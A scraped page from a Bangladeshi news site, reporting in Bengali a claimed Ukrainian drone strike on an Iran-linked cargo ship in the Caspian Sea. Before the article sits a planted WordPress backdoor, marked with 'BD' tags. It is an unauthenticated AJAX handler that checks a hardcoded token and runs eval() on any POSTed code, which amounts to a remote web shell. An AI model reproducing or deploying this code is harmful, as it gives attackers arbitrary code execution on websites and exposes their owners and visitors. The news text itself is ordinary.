// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== কাস্পিয়ান সাগরে ইরানি জাহাজে ইউক্রেনের হামলা, নিহত ১ | potrikaybangladesh.com
Wednesday, September 23, 2026
Homeকাস্পিয়ান সাগরে ইরানি জাহাজে ইউক্রেনের হামলা, নিহত ১

কাস্পিয়ান সাগরে ইরানি জাহাজে ইউক্রেনের হামলা, নিহত ১

ট্রাম্পের নির্দেশে ইরানের বিরুদ্ধে হামলা বন্ধ করেছে যুক্তরাষ্ট্র। 

টানা ১৩ দিনের হামলার পর যখন এই তথ্য প্রকাশ্যে এলো, তখন অন্য এক যুদ্ধক্ষেত্রে ইরানের সংশ্লিষ্টতার খবর পাওয়া গেল। জানা গেছে, তেহরানের বাণিজ্যিক জাহাজে হামলা চালিয়েছে কিয়েভ। 

আজ রোববার এই তথ্য জানিয়েছে বার্তা সংস্থা এএফপি।

কাস্পিয়ান সাগরে ইরানের একটি বাণিজ্যিক জাহাজে হামলা চালিয়েছে ইউক্রেন—এমন দাবি করেছে তেহরান। ওই হামলায় এক নাবিক নিহত ও অপর একজন আহত হয়েছেন।

তেহরান হুশিয়ারি দিয়েছে, এই হামলার উপযুক্ত জবাব দেওয়া হবে।

এর আগে ইউক্রেনের প্রেসিডেন্ট ভলোদিমির জেলেনস্কি জানান, কাস্পিয়ান সাগরে সামরিক উপকরণ পরিবহনকারী কিছু নৌযানের বিরুদ্ধে দূরপাল্লার হামলা চালিয়েছে কিয়েভ।

জেলেনস্কি আরও জানান, এসব নৌযান ইরানের সঙ্গে সংশ্লিষ্ট।

ইরানের রাষ্ট্রীয় বার্তা সংস্থা আইআরএনএ দেশটির পররাষ্ট্র মন্ত্রণালয়ের বরাত দিয়ে জানিয়েছে, গত শনিবার সকালে হামলার ফলে একটি জাহাজে বিস্ফোরণ ঘটে। এতে একজন নাবিক নিহত এবং আরেকজন আহত হন।

মন্ত্রণালয়ের দাবি, ‘রাশিয়া-ইউক্রেন সংঘাতে ইরান কখনোই হস্তক্ষেপ করেনি।’

শনিবার জেলেনস্কি সামাজিক মাধ্যমে এই হামলার বিষয়টি উল্লেখ করেন। তিনি জানান, ‘কাস্পিয়ান সাগরে দূরপাল্লার হামলায় উল্লেখযোগ্য সাফল্য এসেছে—যার মধ্যে আছে সামরিক উপকরণ পারাপারের কাজে ব্যবহৃত ইরান-সংশ্লিষ্ট মালবাহী জাহাজ এবং একটি যুদ্ধজাহাজ।’

ইউক্রেনের গোয়েন্দা সংস্থা এসবিইউ সামাজিক যোগাযোগমাধ্যম টেলিগ্রামে পোস্ট করে জানিয়েছে, ‘আন্তর্জাতিক নিষেধাজ্ঞার আওতাভুক্ত মালবাহী জাহাজে ড্রোন হামলা চালানো হয়েছে। জাহাজগুলো ইরান ও রাশিয়ার মধ্যে সামরিক উপকরণ পারাপারে ব্যবহার হচ্ছিল।’

এই ‘বৈরী ও অপরাধমূলক’ ঘটনার পর তেহরানে নিযুক্ত ইউক্রেনের শার্জ দ্য অ্যাফেয়ার্সকে তলব করে প্রতিবাদ জানিয়েছে ইরান। এ তথ্য জানিয়েছে দেশটির রাষ্ট্রীয় গণমাধ্যম ইরনা।

টিভিতে প্রচারিত প্রতিবেদনে ইরনা আরও জানায়, ইউরোপীয় ইউনিয়নের পররাষ্ট্রনীতি প্রধান কাজা কাল্লাসের সঙ্গে কথোপকথনে ইরানের পররাষ্ট্রমন্ত্রী আব্বাস আরাঘচি এই হামলার বিরুদ্ধে ইউরোপীয় ইউনিয়ন ও জাতিসংঘের নিরাপত্তা পরিষদকে ‘কড়া জবাব’ দেওয়ার আহ্বান জানান।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments